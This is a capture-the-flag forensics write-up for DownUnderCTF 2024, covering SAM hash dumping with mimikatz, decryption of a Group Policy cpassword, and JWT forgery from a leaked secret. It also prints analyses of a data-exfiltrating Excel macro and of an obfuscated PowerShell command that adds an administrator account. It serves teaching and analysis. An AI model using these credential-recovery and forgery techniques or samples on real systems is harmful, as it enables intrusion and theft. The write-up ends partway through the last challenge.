DownUnderCTF 2024 - Forensics

Posted by Mar10 on 2024-07-07

Baby's First Forensics

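They have been trying to breach our infrastructure all morning! They are trying to get more information about our secret kangaroos! We need your help: we captured some of the traffic from their attack on us. Can you tell us what tool they were using and its version?

Note: wrap your answer in DUCTF{}, e.g. DUCTF{nmap_7.25}

Attachment: capture.pcap

Nikto is a web server scanner.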

DUCTF{Nikto_2.1.6}

SAM I AM

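The attackers managed to gain Domain Admin on our rebels' Domain Controller! It looks like they managed to log on with an account using WMI and dumped some files.
Can you reproduce how they obtained the Administrator password using the artifacts provided?
Place the Administrator account's password in DUCTF{}, e.g. DUCTF{password123!}

Attachment: samiam.zip

We are given the SAM and SYSTEM files and asked for the Administrator password, so mimikatz naturally comes to mind.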

mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

mimikatz # lsadump::sam /sam:\sam.bak /system:\system.bak
Domain : DUCTF-AD
SysKey : a88f47504785ba029e8fa532c4c9e27b
Local SID : S-1-5-21-2461790198-1013503533-1008536141

SAMKey : 848804bda5d876ca7027beeee0efdd7c

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 476b4dddbbffde29e739b618580adb1e

RID  : 000001f5 (501)
User : Guest

Look the hash 476b4dddbbffde29e739b618580adb1e up on cmd5, which gives !checkerboard1

I suspect there are sites abroad where this can be looked up without paying..

DUCTF{!checkerboard1}

Bad Policies

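It looks like the attackers managed to access the rebels' Domain Controller.
Can you figure out how they gained access, now that we have pulled these artifacts from one of our Outpost machines?

Attachment: badpolicies.zip

Reference: https://www.cnblogs.com/404p3rs0n/p/15675872.html

Recovering a password stored in Group Policy

Locate the configuration file Groups.xml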

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Backup" image="2" changed="2024-06-12 14:26:50" uid="{CE475804-94EA-4C12-8B2E-2B3FFF1A05C4}"><Properties action="U" newName="" fullName="" description="" cpassword="B+iL/dnbBHSlVf66R8HOuAiGHAtFOVLZwXu0FYf+jQ6553UUgGNwSZucgdz98klzBuFqKtTpO1bRZIsrF8b4Hu5n6KccA7SBWlbLBWnLXAkPquHFwdC70HXBcRlz38q2" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="Backup"/></User>
</Groups>

The item to note is the cpassword attribute, which holds the encrypted value:

B+iL/dnbBHSlVf66R8HOuAiGHAtFOVLZwXu0FYf+jQ6553UUgGNwSZucgdz98klzBuFqKtTpO1bRZIsrF8b4Hu5n6KccA7SBWlbLBWnLXAkPquHFwdC70HXBcRlz38q2

The encryption is AES-256. AES-256 itself is hard to break, but Microsoft chose to publish the AES-256 key used here:

 4e 99 06 e8  fc b6 6c c9  fa f4 93 10  62 0f fe e8
 f4 96 e8 06  cc 05 79 90  20 9b 09 a4  33 b6 6c 1b

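With this key we can recover the plaintext.

One way to do so is Get-GPPPassword.ps1, the open-source PowerShell script by Chris Campbell (@obscuresec).

Project: https://github.com/PowerShellMafia/PowerSploit/tree/master/Exfiltration

The script runs on a domain-joined host, automatically searches the files in the \SYSVOL share, and recovers every plaintext password.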

powershell -executionpolicy bypass -file Get-GPPPassword.ps1

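Here we only need the cpassword value, which can be decrypted directly with the following code

#!/usr/bin/env python3
import sys
from base64 import b64decode
from Crypto.Cipher import AES  # PyCryptodome

if len(sys.argv) != 2:
    print("usage: decrypt.py <cpassword>")
    sys.exit(1)

# AES-256 key published by Microsoft (the 32 bytes listed above)
key = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
cpassword = sys.argv[1]
# Restore any base64 padding that is missing
cpassword += "=" * ((4 - len(cpassword) % 4) % 4)
ciphertext = b64decode(cpassword)
# AES-CBC with an all-zero IV
cipher = AES.new(key, AES.MODE_CBC, b"\x00" * 16)
plaintext = cipher.decrypt(ciphertext)
# Strip the padding (last byte gives its length), then decode UTF-16LE
print(plaintext[:-plaintext[-1]].decode("utf-16-le"))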

DUCTF{D0n7_Us3_P4s5w0rds_1n_Gr0up_P0l1cy}
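The defender's side of the same finding, as an added example that is not part of the original write-up: walk a copy of SYSVOL and report every preference XML file that still carries a non-empty cpassword attribute. The directory layout, the placeholder policy folder names and the second "clean" file are constructed for the demo; the flagged file is the Groups.xml shown above.

```python
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

def find_cpasswords(root_dir):
    """Return one finding per XML element that carries a non-empty cpassword."""
    findings = []
    for path in sorted(Path(root_dir).rglob("*.xml")):
        try:
            root = ET.parse(path).getroot()
        except ET.ParseError:
            continue  # not well-formed XML, nothing to audit
        parent_of = {child: parent for parent in root.iter() for child in parent}
        for elem in root.iter():
            if not elem.get("cpassword"):
                continue  # attribute absent or empty
            owner = parent_of.get(elem, elem)
            findings.append({
                "file": str(path.relative_to(root_dir)),
                "account": elem.get("userName") or owner.get("name"),
                "changed": owner.get("changed"),
                "cpassword_len": len(elem.get("cpassword")),
            })
    return findings

# Groups.xml from the challenge, as shown above (line breaks added between attributes).
GROUPS_XML = '''<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Backup" image="2"
 changed="2024-06-12 14:26:50" uid="{CE475804-94EA-4C12-8B2E-2B3FFF1A05C4}">
<Properties action="U" newName="" fullName="" description=""
 cpassword="B+iL/dnbBHSlVf66R8HOuAiGHAtFOVLZwXu0FYf+jQ6553UUgGNwSZucgdz98klzBuFqKtTpO1bRZIsrF8b4Hu5n6KccA7SBWlbLBWnLXAkPquHFwdC70HXBcRlz38q2"
 changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="Backup"/>
</User></Groups>
'''

# Constructed counter-example: same structure, but no stored password.
CLEAN_XML = '''<?xml version="1.0" encoding="utf-8"?>
<Groups><User name="Helpdesk" changed="2024-01-01 00:00:00">
<Properties action="U" cpassword="" userName="Helpdesk"/></User></Groups>
'''

def demo():
    """Build a small SYSVOL-like tree in a temp directory and audit it."""
    with tempfile.TemporaryDirectory() as base:
        for folder, body in (("{POLICY-A-PLACEHOLDER}", GROUPS_XML),
                             ("{POLICY-B-PLACEHOLDER}", CLEAN_XML)):
            target = Path(base, "Policies", folder, "Machine", "Preferences", "Groups")
            target.mkdir(parents=True)
            (target / "Groups.xml").write_text(body, encoding="utf-8")
        return find_cpasswords(base)

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Any hit means the password should be treated as disclosed to every domain user who can read SYSVOL, so the account's password needs rotating as well as the file being removed.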

emuc2

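Like all good nation states, we have our own malware and C2 for offensive operations. But someone got hold of the source code and is using it against us! Here is a traffic capture we found on one of our laptops...

Attachments: sslkeylogfile.txt, challenge.pcap

The sslkeylogfile points to TLS.

External applications can decrypt TLS connections by means of a key log. Wireshark 1.6.0 and later can use this log file to decrypt packets. Tell Wireshark where to find the key file via Wireshark -> Preferences -> Protocols -> TLS -> (Pre)-Master-Secret log file.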
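An added example, not from the original write-up: a parser for the key log format that sslkeylogfile.txt uses, which reports per session which secrets are present so you can tell before opening Wireshark whether a stream has what it needs. The sample lines are constructed, not taken from the challenge file.

```python
import re
from collections import defaultdict

# Labels needed for both directions of a TLS 1.3 session (handshake + application data).
TLS13_LABELS = {
    "CLIENT_HANDSHAKE_TRAFFIC_SECRET", "SERVER_HANDSHAKE_TRAFFIC_SECRET",
    "CLIENT_TRAFFIC_SECRET_0", "SERVER_TRAFFIC_SECRET_0",
}
OPTIONAL_LABELS = {"CLIENT_EARLY_TRAFFIC_SECRET", "EARLY_EXPORTER_SECRET", "EXPORTER_SECRET"}
# <label> <32-byte client random as hex> <secret as hex>
LINE = re.compile(r"^([A-Z0-9_]+) ([0-9a-fA-F]{64}) ([0-9a-fA-F]+)$")

def parse_keylog(text):
    """Return ({client_random: {label: secret}}, [rejected line numbers])."""
    sessions, rejected = defaultdict(dict), []
    for number, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        match = LINE.match(line)
        known = match and (match.group(1) == "CLIENT_RANDOM"
                           or match.group(1) in TLS13_LABELS | OPTIONAL_LABELS)
        if not known:
            rejected.append(number)  # includes the legacy RSA label, out of scope here
            continue
        label, client_random, secret = match.groups()
        # TLS 1.2 master secret is 48 bytes; TLS 1.3 secrets are hash-sized (32 or 48).
        if label == "CLIENT_RANDOM":
            length_ok = len(secret) == 96
        else:
            length_ok = len(secret) in (64, 96)
        if not length_ok:
            rejected.append(number)
            continue
        sessions[client_random.lower()][label] = secret.lower()
    return dict(sessions), rejected

def summarize(sessions):
    """Map each client random to (protocol family, missing TLS 1.3 labels)."""
    summary = {}
    for client_random, secrets in sessions.items():
        if "CLIENT_RANDOM" in secrets:
            summary[client_random] = ("tls1.2", [])
        else:
            summary[client_random] = ("tls1.3", sorted(TLS13_LABELS - set(secrets)))
    return summary

# Constructed sample: one TLS 1.2 session, one TLS 1.3 session missing a secret,
# and one truncated line.
SAMPLE = "\n".join([
    "# constructed key log for illustration",
    "CLIENT_RANDOM " + "11" * 32 + " " + "aa" * 48,
    "CLIENT_HANDSHAKE_TRAFFIC_SECRET " + "22" * 32 + " " + "bb" * 32,
    "SERVER_HANDSHAKE_TRAFFIC_SECRET " + "22" * 32 + " " + "cc" * 32,
    "CLIENT_TRAFFIC_SECRET_0 " + "22" * 32 + " " + "dd" * 32,
    "CLIENT_RANDOM " + "33" * 32 + " " + "ee" * 10,
])

if __name__ == "__main__":
    parsed, bad = parse_keylog(SAMPLE)
    print(summarize(parsed), "rejected lines:", bad)
```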

Following the TLS streams, stream 34 mentions a JWT token, which may come in handy later

PRI * HTTP/2.0

SM

..............d.....................................`u..h...A.......X..A-...G.lC.K..iy-"e^B.z...f.....S..j....5Ia.".g.M........
u.^E.1..l...).f..F..(7R......K..zJ.B%........*..(.3
....S.*/*..........................@....................................................N.h._..u.b
&=LtA.a..=.J..2.B...P,.m..eLZ7.@...Rd ...Vz.O_.5I-.BV!.=.....v..ru*.@....RKRVO....I.R?......@.......z.c...........O\.58..:......{"error":"Error validating JWT token - No token provided"}

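Stream 23 contains a large block of encrypted data, which is very suspicious, so follow the HTTP/2 stream

It shows a URL path, /api/env, which should also be useful shortly

Since there is HTTP/2 traffic, look through all of it

This turns up forensics-emuc2-b6abd8652aa4.2024.ductf.dev/api/login; log in with the username and password from the capture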

{"username": "jooospeh", "password": "n3v3r-g0nna-g1v3-th3-b1rds-up"}

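The site says we have no permission to view the flag, so either find a password and log in as the administrator, or forge an administrator login. Recalling the JWT token seen at the start, forging one is the option to pursue.

Given the large amount of data found under /api/env, request one of the entries at random to see what it is, for example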

https://forensics-emuc2-b6abd8652aa4.2024.ductf.dev/api/env/kMyYN2gsez9DQqovBkX4KwxRgpOAbxgb

This suggests that one of these files contains the JWT token. Save the paths obtained earlier.

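Tidy up the list, capture the request, and brute-force through the paths.

I had assumed they were all decoy files, but after the run the response lengths showed that many of them contain parameters. Searching for the keyword JWT locates the right one directly.

This gives the JWT secret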

JWT_SECRET=3gHsCBkpZLi99zyiPqfY/NfFJqZzmNL4BAhYN8rAjRn49baTcnmyGISLD6T58XcWIUYrBfltI2iq2N6OHQSrfqBRFxFta61PvmnfRyn8Ep8T55lvLT8Es62kN3x35Bcb0OZmOGmM/zKf2qadcBq3Nbq1MiIVKJMz4w3JOk4orwFPtSNpNh8uaSQQUNMKTT6cvD9bvRvFNeeHYSPhDFwayPIRr5TJ+BpIRTUTfc1C3WCKoOuXCz2t+ISZo5yYwZ6U5w7NKFTTuDqMP/dXevkVykuntdej55XE3fsCP+UVFUT2JrY+Z9Q1aKTgavQR5smYVn93RlpbFwCoSStoANnoi

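Generate a new JWT. The payload data comes from the same stream in which the login password was found.

import jwt  # PyJWT

# Payload structure taken from the stream that held the login credentials
data = {"subject_id": 1, "exp": 1920187883}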

JWT_SECRET = "3gHsCBkpZLi99zyiPqfY/NfFJqZzmNL4BAhYN8rAjRn49baTcnmyGISLD6T58XcWIUYrBfltI2iq2N6OHQSrfqBRFxFta61PvmnfRyn8Ep8T55lvLT8Es62kN3x35Bcb0OZmOGmM/zKf2qadcBq3Nbq1MiIVKJMz4w3JOk4orwFPtSNpNh8uaSQQUNMKTT6cvD9bvRvFNeeHYSPhDFwayPIRr5TJ+BpIRTUTfc1C3WCKoOuXCz2t+ISZo5yYwZ6U5w7NKFTTuDqMP/dXevkVykuntdej55XE3fsCP+UVFUT2JrY+Z9Q1aKTgavQR5smYVn93RlpbFwCoSStoANnoi"

encoded = jwt.encode(data, JWT_SECRET, algorithm="HS512")
print(encoded)

After replacing the JWT token in the web page, we get the flag

DUCTF{pǝʇɔǝɟuᴉ_sᴉ_ǝlᴉɟ_dᴉz_ǝɥʇ_oʇ_pɹoʍssɐd_ǝɥʇ}

Macro Magic

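We managed to pull this Excel spreadsheet artifact from one of our Outpost machines. It has something going on under the hood. After opening it, we found and captured some suspicious traffic on the network. Can you find out what this traffic is and find the flag?
Note: you do not need to run or enable the macro to solve this.

Attachment: macromagic.zip

The description mentions macros and hints that they do not need to be run or enabled. Analyse the file with oledump.py, which can display macro code without executing it.

Project: https://github.com/decalage2/oledump-contrib

It needs the Python module OleFileIO_PL

pip install olefile

Usage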

┌──(root💀kali)-[~/桌面/oledump-contrib]
└─# python2 oledump.py ../Monke.xlsm
A: xl/vbaProject.bin
 A1:       515 'PROJECT'
 A2:       107 'PROJECTwm'
 A3: M   24526 'VBA/Module1'
 A4: m    1158 'VBA/Sheet1'
 A5: m     985 'VBA/Sheet2'
 A6: m    1158 'VBA/ThisWorkbook'
 A7:      4438 'VBA/_VBA_PROJECT'
 A8:      3276 'VBA/__SRP_0'
 A9:       239 'VBA/__SRP_1'
A10:       434 'VBA/__SRP_2'
A11:      3988 'VBA/__SRP_3'
A12:       384 'VBA/__SRP_4'
A13:        66 'VBA/__SRP_5'
A14:       276 'VBA/__SRP_6'
A15:        66 'VBA/__SRP_7'
A16:       602 'VBA/dir'

View the macro source

python2 oledump.py -s A3 -v ../Monke.xlsm

-s <stream>: select one of the streams listed above and view its contents

-v: decompress the VBA macro

There is a lot of decoy data, such as

MDAxMTEwMDAgMDAxMTAxMDAgMDAxMDAwMDAgMDAxMTAwMDEgMDAxMTAwMDEgMDAxMTAxMDAgMDAxMDAwMDAgMDAxMTAwMDEgMDAxMTAwMTAgMDAxMTAwMDEgMDAxMDAwMDAgMDAxMTAwMTEgMDAxMTAwMTAgMDAxMDAwMDAgMDAxMTAxMTEgMDAxMTAwMTAgMDAxMDAwMDAgMDAxMTEwMDEgMDAxMTAxMTEgMDAxMDAwMDAgMDAxMTAwMDEgMDAxMTAwMDEgMDAxMTAxMDAgMDAxMDAwMDAgMDAxMTAwMDEgMDAxMTAwMDAgMDAxMTAwMDAgMDAxMDAwMDAgMDAxMTAwMDEgMDAxMTAwMDAgMDAxMTAwMDEgMDAxMDAwMDAgMDAxMTAwMDEgMDAxMTAwMDEgMDAxMTAxMDA=

Others decode to FAKEFLAG{DUCTF_Fake_Flag} and the like; simply delete them

After cleaning up, the following code remains

Attribute VB_Name = "Module1"

Public Function anotherThing(B As String, C As String) As String
    Dim I As Long
    Dim A As String
    For I = 1 To Len(B)
        A = A & Chr(Asc(Mid(B, I, 1)) Xor Asc(Mid(C, (I - 1) Mod Len(C) + 1, 1)))
    Next I
    anotherThing = A
End Function

Public Function importantThing()
    Dim tempString As String
    Dim tempInteger As Integer
    Dim I As Integer
    Dim J As Integer
    For I = 1 To 5
        Cells(I, 2).Value = WorksheetFunction.RandBetween(0, 1000)
    Next I
    For I = 1 To 5
        For J = I + 1 To 5
            If Cells(J, 2).Value < Cells(I, 2).Value Then
                tempString = Cells(I, 1).Value
                Cells(I, 1).Value = Cells(J, 1).Value
                Cells(J, 1).Value = tempString
                tempInteger = Cells(I, 2).Value
                Cells(I, 2).Value = Cells(J, 2).Value
                Cells(J, 2).Value = tempInteger
            End If
        Next J
    Next I
End Function

Public Function totalyFine(A As String) As String
    Dim B As String
    B = Replace(A, " ", "-")
    totalyFine = B
End Function

Sub macro1()
    Dim Path As String
    Dim wb As Workbook
    Dim A As String
    Dim B As String
    Dim C As String
    Dim D As String
    Dim E As String
    Dim F As String
    Dim G As String
    Dim H As String
    Dim J As String
    Dim K As String
    Dim L As String
    Dim M As String
    Dim N As String
    Dim O As String
    Dim P As String
    Dim Q As String
    Dim R As String
    Dim S As String
    Dim T As String
    Dim U As String
    Dim V As String
    Dim W As String
    Dim X As String
    Dim Y As String
    Dim Z As String
    Dim I As Long
    N = importantThing()
    K = "Yes"
    S = "Mon"
    U = forensics(K)
    V = totalyFine(U)
    D = "Ma"
    J = "https://play.duc.tf/" + V
    superThing (J)
    J = "http://flag.com/"
    superThing (J)
    G = "key"
    J = "http://play.duc.tf/"
    superThing (J)
    J = "http://en.wikipedia.org/wiki/Emu_War"
    superThing (J)
    N = importantThing()
    Path = ThisWorkbook.Path & "\flag.xlsx"
    Set wb = Workbooks.Open(Path)
    Dim valueA1 As Variant
    valueA1 = wb.Sheets(1).Range("A1").Value
    MsgBox valueA1
    wb.Close SaveChanges:=False
    F = "gic"
    N = importantThing()
    Q = "Flag: " & valueA1
    H = "Try Harder"
    U = forensics(H)
    V = totalyFine(U)
    J = "http://downunderctf.com/" + V
    superThing (J)
    W = S + G + D + F
    O = doThing(Q, W)
    M = anotherThing(O, W)
    A = something(O)
    Z = forensics(O)
    N = importantThing()
    P = "Pterodactyl"
    U = forensics(P)
    V = totalyFine(U)
    J = "http://play.duc.tf/" + V
    superThing (J)
    T = totalyFine(Z)
    MsgBox T
    J = "http://downunderctf.com/" + T
    superThing (J)
    N = importantThing()
    E = "Forensics"
    U = forensics(E)
    V = totalyFine(U)
    J = "http://play.duc.tf/" + V
    superThing (J)
    
End Sub

Public Function doThing(B As String, C As String) As String
    Dim I As Long
    Dim A As String
    For I = 1 To Len(B)
        A = A & Chr(Asc(Mid(B, I, 1)) Xor Asc(Mid(C, (I - 1) Mod Len(C) + 1, 1)))
    Next I
    doThing = A
End Function

Public Function superThing(ByVal A As String) As String
    With CreateObject("MSXML2.ServerXMLHTTP.6.0")
        .Open "GET", A, False
        .Send
        superThing = StrConv(.responseBody, vbUnicode)
    End With
End Function

Public Function something(B As String) As String
    Dim I As Long
    Dim A As String
    For I = 1 To Len(inputText)
        A = A & WorksheetFunction.Dec2Bin(Asc(Mid(B, I, 1)))
    Next I
    something = A
End Function

Public Function forensics(B As String) As String
    Dim A() As Byte
    Dim I As Integer
    Dim C As String
    A = StrConv(B, vbFromUnicode)
    For I = LBound(A) To UBound(A)
        C = C & CStr(A(I)) & " "
    Next I
    C = Trim(C)
    forensics = C
End Function

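A brief analysis of the main parts of the code:

  1. Functions anotherThing and doThing
    • These two functions do the same kind of work: they XOR two strings. They walk through each character of the first string, XOR its ASCII value with the ASCII value of the character at the corresponding position in the second string (cycling through the second string), convert the result back to a character, and concatenate the results.
  2. Function importantThing
    • This function generates 5 random numbers and places them in the second column of the Excel worksheet. It then sorts those random numbers and rearranges the values in the first column to match.
  3. Function totalyFine
    • This function replaces every space in the input string with a dash (-).
  4. Function superThing
    • This function uses an MSXML2.ServerXMLHTTP.6.0 object to send a GET request to the given URL and returns the response body (converted to a Unicode string).
  5. Function something
    • This function converts the ASCII value of each character of the input string to a binary string and concatenates those binary strings.
  6. Function forensics
    • This function converts the input string to a byte array (StrConv with vbFromUnicode), then converts each byte to its decimal string and joins them, separated by spaces.
  7. Subroutine macro1
    • This subroutine is the main entry point. It calls the functions above to carry out a series of operations: generating random numbers, sorting, replacing spaces in strings, sending HTTP requests, converting strings, and so on. It also opens a workbook named "flag.xlsx", reads the value of cell A1, and shows a message box. Finally, it uses those values for further string operations and HTTP requests.

Have an AI rewrite it in Python (文心一言, ERNIE Bot, actually did quite well)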

import requests
import os
import random
import openpyxl

def another_thing(b, c):
    # VBA's Mid() is 1-based; with Python's 0-based i the key index is i % len(c)
    return ''.join(chr(ord(b[i]) ^ ord(c[i % len(c)])) for i in range(len(b)))
  
def important_thing():  
    wb = openpyxl.Workbook()  
    ws = wb.active  
    for i in range(1, 6):  
        ws[f'B{i}'] = random.randint(0, 1000)  
    values = [(ws[f'B{i}'].value, f'A{i}') for i in range(1, 6)]  
    values.sort()  
    for i, (val, cell) in enumerate(values):  
        ws[cell] = i + 1  
    wb.save('temp.xlsx')  
    return None  
  
def totaly_fine(a):  
    return a.replace(" ", "-")  
  
def do_thing(b, c):
    # Same repeating-key XOR as another_thing; key index is i % len(c)
    return ''.join(chr(ord(b[i]) ^ ord(c[i % len(c)])) for i in range(len(b)))
  
def super_thing(a):  
    response = requests.get(a)  
    return response.text  
  
def something(b):  
    return ''.join(format(ord(c), 'b') for c in b)  
  
def forensics(b):  
    return ' '.join(str(byte) for byte in b.encode())  
  
def macro1():  
    important_thing()  
    k = "Yes"  
    s = "Mon"  
    u = forensics(k)  
    v = totaly_fine(u)  
    d = "Ma"  
    j = f"https://play.duc.tf/{v}"  
    super_thing(j)  
    j = "http://flag.com/"  
    super_thing(j)  
    g = "key"  
    j = "http://play.duc.tf/"  
    super_thing(j)  
    j = "http://en.wikipedia.org/wiki/Emu_War"  
    super_thing(j)  
    important_thing()  
    path = os.path.join(os.getcwd(), 'flag.xlsx')  
    wb = openpyxl.load_workbook(path)  
    value_a1 = wb.worksheets[0]['A1'].value
    print(value_a1)  
    wb.close()  
    f = "gic"  
    important_thing()  
    q = f"Flag: {value_a1}"  
    h = "Try Harder"  
    u = forensics(h)  
    v = totaly_fine(u)  
    j = f"http://downunderctf.com/{v}"  
    super_thing(j)  
    w = s + g + d + f  
    o = do_thing(q, w)  
    m = another_thing(o, w)  
    a = something(o)  
    z = forensics(o)  
    important_thing()  
    p = "Pterodactyl"  
    u = forensics(p)  
    v = totaly_fine(u)  
    j = f"http://play.duc.tf/{v}"  
    super_thing(j)  
    t = totaly_fine(z)  
    print(t)  
    j = f"http://downunderctf.com/{t}"  
    super_thing(j)  
    important_thing()  
    e = "Forensics"  
    u = forensics(e)  
    v = totaly_fine(u)  
    j = f"http://play.duc.tf/{v}"  
    super_thing(j)  
  
# Run the macro  
macro1()

The Python version is much easier to read

    w = s + g + d + f  
    o = do_thing(q, w)  
    m = another_thing(o, w)  

This part is clearly doing an XOR, and w should be the XOR key, so go back and find the corresponding values

s = "Mon" 
g = "key"  
d = "Ma"
f = "gic"

This gives the key: MonkeyMagic. Now only the ciphertext is missing.

Given all the URLs the macro assembles, this is where the packet capture comes in

https://downunderctf.com/84-114-121-32-72-97-114-100-101-114
https://play.duc.tf/80-116-101-114-111-100-97-99-116-121-108
https://downunderctf.com/11-3-15-12-95-89-9-52-36-61-37-54-34-90-15-86-38-26-80-19-1-60-12-38-49-9-28-38-0-81-9-2-80-52-28-19
https://play.duc.tf/70-111-114-101-110-115-105-99-115

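I tried them: apart from the third, converting the decimal values to characters gives Try Harder, Pterodactyl and Forensics respectively.

So the ciphertext should be the third one, and its length fits as well.

Write the decryption script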

def decode(encoded, key):
    return ''.join(chr(encoded[i] ^ ord(key[(i) % len(key)])) for i in range(len(encoded)))

flag = [11, 3, 15, 12, 95, 89, 9, 52, 36, 61, 37, 54, 34, 90, 15, 86, 38, 26, 80, 19, 1, 60, 12, 38, 49, 9, 28, 38, 0, 81, 9, 2, 80, 52, 28, 19]
key = "MonkeyMagic"

decoded_message = decode(flag, key)
print(decoded_message)

Running it gives Flag: DUCTF{M4d3_W1th_AI_by_M0nk3ys}
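The triage step described above, as an added example that is not part of the original write-up: it decodes the path of each captured request, treats printable results as decoys, and applies the MonkeyMagic XOR only to the one that is not printable. The URL list is the one shown above; function names are made up for this example.

```python
from urllib.parse import urlparse

# Request URLs recovered from the capture, as listed above.
CAPTURED = [
    "https://downunderctf.com/84-114-121-32-72-97-114-100-101-114",
    "https://play.duc.tf/80-116-101-114-111-100-97-99-116-121-108",
    "https://downunderctf.com/11-3-15-12-95-89-9-52-36-61-37-54-34-90-15-86-38-26"
    "-80-19-1-60-12-38-49-9-28-38-0-81-9-2-80-52-28-19",
    "https://play.duc.tf/70-111-114-101-110-115-105-99-115",
]
KEY = "MonkeyMagic"  # S + G + D + F in macro1

def decode_path(url):
    """Undo totalyFine(forensics(...)): dash-separated decimals back to bytes."""
    path = urlparse(url).path.lstrip("/")
    return bytes(int(part) for part in path.split("-"))

def is_printable(data):
    """True when every byte is printable ASCII, i.e. the value was sent unencrypted."""
    return all(0x20 <= byte < 0x7F for byte in data)

def xor(data, key):
    """Repeating-key XOR, the operation doThing performs in the macro."""
    key_bytes = key.encode()
    return bytes(b ^ key_bytes[i % len(key_bytes)] for i, b in enumerate(data))

def triage(urls, key):
    """Split the requests into plain decoys and XOR-decrypted payloads."""
    decoys, recovered = [], []
    for url in urls:
        raw = decode_path(url)
        if is_printable(raw):
            decoys.append(raw.decode("ascii"))
        else:
            recovered.append(xor(raw, key).decode("ascii"))
    return decoys, recovered

if __name__ == "__main__":
    plain, secret = triage(CAPTURED, KEY)
    print("decoys:", plain)
    print("recovered:", secret)
```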

Lost in Memory

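It looks like one of our emu soldiers ran something on an Outpost machine, and now it is doing strange things. As a precaution we took a memory dump. Can you tell us what happened?
This challenge has four parts that combine into the final flag, with _ between each answer. Find all four answers and combine them into an all-lowercase flag of the form DUCTF{answer1_answer2_answer3_answer4}, e.g. DUCTF{malicious.xlsm_invoke-mimikatz_malware.exe-malware2.exe_strong-password123}

  1. What is the name of the malicious executable? e.g. malicious.xlsm
  2. What is the name of the PowerShell module used? e.g. invoke-mimikatz
  3. What are the names of the two files executed from the malicious executable (in alphabetical order, joined with - and no spaces)? e.g. malware.exe-malware2.exe
  4. What is the password of the new account created through PowerShell? e.g. strong-password123

Attachment: EMU-OUTPOST.zip

First identify the image profile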

python2 vol.py -f /root/桌面/EMU-OUTPOST.raw imageinfo

python2 vol.py -f /root/桌面/EMU-OUTPOST.raw --profile=Win7SP1x86 cmdscan 

The command history shows a suspicious file name, monkey.doc.ps1, which is the answer to question 1

Further down there is also

notepad.exe pid:   3048
Command line : "C:\Windows\System32\notepad.exe" "C:\Users\emu\Downloads\monkey.doc.ps1"

Find the corresponding process ID

python2 vol.py -f /root/桌面/EMU-OUTPOST.raw --profile=Win7SP1x86 pstree

Name                                                  Pid   PPid   Thds   Hnds Time
-------------------------------------------------- ------ ------ ------ ------ ----
0x8439a030:notepad.exe                             4044   3176      3     78 2024-06-18 10:00:15 UTC+0000

Dump the process

python2 vol.py -f /root/桌面/EMU-OUTPOST.raw --profile=Win7SP1x86 memdump -p 4044 --dump-dir=/root/桌面

From the commands analysed above, monkey.doc.ps1 was run through PowerShell, so search for that keyword

strings ../../4044.dmp | grep "powershell" 
powershell.exe
powershell/
powershell.exe
powershell.exe
powershell.exe
powershell/
ly loaded EXE won't kill the powershell process when it exits, it will just kill its own thread.
ly loaded EXE won't kill the powershell process when it exits, it will just kill its own thread.
powershell $PKjAU=  ") )'dd'+'a/ n'+'i'+'mda'+' sro'+'t'+'artsinimda'+' p'+'uorglacol'+' te'+'n;d'+'d'+'a/ 3r'+'uce5-r3'+'pu'+'5'+' nimda resu '+'te'+'n'(( )'x'+]31[dIlLehs$+]1[diLLehs$ (."; .( $Env:CoMsPeC[4,24,25]-JOIn'')(-join (  gi  vaRiaBlE:pKjAU).valUe[-1 .. - ( (  gi  vaRiaBlE:pKjAU).valUe.leNgth) ] )
Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process.
......

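This PowerShell script looks obfuscated

I asked 文心一言 (ERNIE Bot)

Analyse the variable assignment: first, look at the value assigned to $PKjAU. Note the concatenation pattern in the string; for example, 'dd'+'a/' is really 'dda/'

Decode the string: use PowerShell to carry out the decoding. Because the string is assembled back to front, you may need to write a PowerShell script that reverses it in order to decode it.

This gives 5up3r-5ecur3, which is the answer to question 4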
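A static way to undo the obfuscation without running anything, as an added example that is not part of the original write-up: reverse the string, resolve the $ShellId index lookups, and merge the quoted fragments. The values used for $ShellId and $Env:ComSpec are assumed Windows defaults and do not appear in the dump output above; the function names are made up for this example.

```python
import re

# Payload assigned to $PKjAU, copied from the strings output above.
PAYLOAD = (
    ") )'dd'+'a/ n'+'i'+'mda'+' sro'+'t'+'artsinimda'+' p'+'uorglacol'+' te'+'n;d'"
    "+'d'+'a/ 3r'+'uce5-r3'+'pu'+'5'+' nimda resu '+'te'+'n'"
    "(( )'x'+]31[dIlLehs$+]1[diLLehs$ (."
)

# Assumed defaults on a stock Windows host; neither value is shown on the page.
SHELL_ID = "Microsoft.PowerShell"          # $ShellId
COMSPEC = r"C:\Windows\system32\cmd.exe"   # $Env:ComSpec

def pick(value, indices):
    """Emulate PowerShell string indexing such as $Env:ComSpec[4,24,25] -join ''."""
    return "".join(value[i] for i in indices)

def _join_literals(match):
    # 'a'+'b'+'c'  ->  'abc'
    return "'" + "".join(re.findall(r"'([^']*)'", match.group(0))) + "'"

def deobfuscate(payload):
    """Statically undo the layers of the payload; nothing is executed."""
    text = payload[::-1]  # the launcher reads .Value[-1 .. -Length], i.e. reversed
    text = re.sub(r"\$shellid\[(\d+)\]",
                  lambda m: "'" + pick(SHELL_ID, [int(m.group(1))]) + "'",
                  text, flags=re.IGNORECASE)
    return re.sub(r"(?:'[^']*'\s*\+\s*)+'[^']*'", _join_literals, text)

def commands(payload):
    """Return the verb being invoked and the individual commands passed to it."""
    literals = re.findall(r"'([^']*)'", deobfuscate(payload))
    verb, script = literals[0], literals[1]
    return verb, [part.strip() for part in script.split(";")]

if __name__ == "__main__":
    print("launcher verb:", pick(COMSPEC, [4, 24, 25]))
    print(deobfuscate(PAYLOAD))
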